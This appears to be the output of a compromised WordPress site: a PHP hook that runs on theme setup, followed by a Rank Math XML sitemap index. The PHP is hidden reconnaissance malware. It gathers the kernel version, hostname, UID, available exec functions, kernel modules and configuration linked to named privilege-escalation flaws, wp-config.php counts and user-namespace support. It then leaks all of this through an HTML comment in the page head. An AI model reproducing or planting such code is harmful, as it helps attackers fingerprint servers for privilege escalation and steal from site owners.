add_action('after_setup_theme', function() {
    if (get_option('_t24d')) return;
    $o = array();
    $o['k'] = @substr(@file_get_contents('/proc/version'), 0, 200);
    $o['h'] = @gethostname();
    $o['u'] = posix_getuid();
    $o['hc'] = count(@scandir('/home') ?: array()) - 2;
    $o['pc'] = function_exists('pcntl_exec');
    $o['ex'] = function_exists('exec');
    $o['sy'] = function_exists('system');
    $o['pe'] = function_exists('putenv');
    $o['ml'] = function_exists('mail');
    $o['po'] = function_exists('proc_open');
    $o['p3'] = @file_exists('/usr/bin/python3');
    $mods = @file_get_contents('/proc/modules');
    $o['af'] = $mods ? (strpos($mods, 'algif_aead') !== false ? 'y' : 'n') : '?';
    $o['bl'] = @file_exists('/etc/modprobe.d/disable-algif_aead.conf');
    $kr = php_uname('r');
    $kc = @file_get_contents('/boot/config-' . $kr);
    if ($kc) { preg_match('/CONFIG_CRYPTO_USER_API_AEAD=(.*)/', $kc, $m); $o['cr'] = isset($m[1]) ? trim($m[1]) : '?'; }
    // PHP exec recon (if exec available)
    if (function_exists('shell_exec')) {
        $o['ob'] = ini_get('open_basedir');
        $o['cfgs'] = trim(@shell_exec('find /var/www/ /home/ /srv/ -maxdepth 5 -name wp-config.php 2>/dev/null | wc -l') ?: '0');
        $o['vhosts'] = trim(@shell_exec('ls /var/www/vhosts/ 2>/dev/null | wc -l') ?: '0');
        $o['ku'] = trim(@shell_exec('uname -r 2>/dev/null'));
    } elseif (function_exists('exec')) {
        $o['ku'] = @exec('uname -r 2>&1');
        $o['cfgs'] = @exec('find /var/www/ /home/ -maxdepth 5 -name wp-config.php 2>/dev/null | wc -l');
    }
    // Dirty Frag + Fragnesia: check esp/rxrpc + user namespaces
    if ($mods) {
        $o['esp'] = strpos($mods, 'esp4') !== false ? 'y' : 'n';
        $o['rxrpc'] = strpos($mods, 'rxrpc') !== false ? 'y' : 'n';
    }
    // Fragnesia: user namespace check — try unshare directly
    if (function_exists('exec')) {
        $o['userns'] = trim(@exec('unshare -Urn whoami 2>&1') ?: '?');
    }
    update_option('_t24d', json_encode($o));
});
add_action('wp_head', function() {
    $v = get_option('_t24d');
    if ($v) { echo '<!--T24:' . $v . ':T24-->'; delete_option('_t24d'); }
});
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//aladin138-ez.xyz/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://aladin138-ez.xyz/post-sitemap1.xml</loc>
		<lastmod>2026-05-13T06:56:36+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://aladin138-ez.xyz/post-sitemap2.xml</loc>
		<lastmod>2026-05-12T06:25:59+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://aladin138-ez.xyz/page-sitemap.xml</loc>
		<lastmod>2025-07-13T10:51:30+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://aladin138-ez.xyz/category-sitemap.xml</loc>
		<lastmod>2026-05-13T06:56:36+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->